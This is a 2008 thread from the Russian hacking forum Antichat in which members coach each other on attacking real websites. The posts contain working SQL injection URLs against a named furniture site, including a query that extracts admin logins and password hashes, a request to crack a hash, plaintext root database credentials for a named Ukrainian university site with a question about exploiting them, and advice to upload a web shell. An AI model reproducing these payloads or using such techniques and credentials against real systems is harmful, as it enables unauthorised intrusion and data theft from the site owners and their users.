ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
13.12.2008, 15:37
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
можно через гугль ошибки поискать...
site:jertva.com Warning
если гугл ошибок не помнит, то идем на
Код:
madnet.name/tools/madss/
вбиваем имя сайта и смотрим, хостятся ли рядом какие-либо сайты... если да, то поочерёдно вбиваем в гугль
site:sait_ryadom_s_jertvoi.com Warning
P.S
кроме Warning, можно и по другим кеям поискать, Error, "failed to open stream"...
Последний раз редактировалось Iceangel_; 13.12.2008 в 15:40..
|
|
|
13.12.2008, 15:51
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
Код:
http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+column_name+from+information_schema.columns+where+table_name=0x61736d5f61646d696e+limit+2,1--
почему сам учётки не высвечиваются? |
|
|
|
13.12.2008, 15:58
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от F4R
Код:
http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+column_name+from+information_schema.columns+where+table_name=0x61736d5f61646d696e+limit+2,1--
почему сам учётки не высвечиваются? Ну наверное чтобы узнать учётки надо вот такой запрос сделать
Код:
http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+concat_ws(0x40,name,password)+from+asm_admin+limit+0,1--
А то что ты выше написал-этим мы всего лишь узнаем какие колонки в таблице asm_admin
|
|
|
|
13.12.2008, 16:19
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
Отлично) спс огромное!
подскажите что ещё за хэш ?
5096c350535026dc
|
|
|
|
13.12.2008, 17:19
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
phpMyAdmin редиректит
Есть сайт bridge.tane.edu.ua, есть пароль на рута
Код:
$DATABASENAME = "stud_test";
$DATABASESERVER = "localhost";
$DATABASEUSER = "root";
$DATABASEPASS = "steppenW";
Есть майадмин: bridge.tane.edu.ua/phpmyadmin/
Сервер запущен на 192.168.101.18, и постоянно туда редиректит, если заходить через майадмин.
Как нормально поюзать багу? |
|
|
|
13.12.2008, 17:42
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406
Репутация:
37
|
|
Подскажите, каким образом можно просмотреть имена таблиц и колонок при SQL-инъекции другой базы данных, находящейся на этом же аккаунте?
|
|
|
|
13.12.2008, 17:44
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Thrasher88
column_name+from+information_schema.columns+where+ table_schema='база'+and+table_name='табли ца'
|
|
|
|
13.12.2008, 17:45
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Он не редиректит просто либо серв мускула на другом серваке,либо на этом же,тогда надо лить шелл.
|
|
|
|
13.12.2008, 17:46
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Goudini
Да всё нормально юзается. Заходит в майадмин с этими данными норм, как root@sectorgaza =)
Что конкретно тебе нужно?
|
|
|
|
14.12.2008, 08:42
|
|
Новичок
Регистрация: 12.12.2008
Сообщений: 1
Провел на форуме:
4304
Репутация:
0
|
|
Всем доброго времени суток!
Я тут недавно начал изучать SQL inj . читал статьи и.т.д
1)Нашел уязвимость подставив кавычку
(выдалась ошибка )
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''100''' at line 6
2)Начал искать кол-во полей подобрал вручную около 50 (потом устал  ),
но на 20 аргументе у меня выдалось не то что всегдда выдавалось
(от 1 до 19 и от 21 до 50),я решил что строк 20....
3)Решил подставить VERSION() USER()..итд
получил ответы:
DB: tmhoxc76
Usr: tmhoxc76@*ipsite*
Ver: 4.1.22-max-log
вобщем вопросик:
даж не знаю как сказать....
вобщем все запросы котрые я делал отображались
не в теле сайта,а шли вместо замены ссылки,но выводились правильно как я понял....
так вот как мне тееперь извлечь данные из таблицы? 
ПыСы: ссорь hack.lang=2 |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид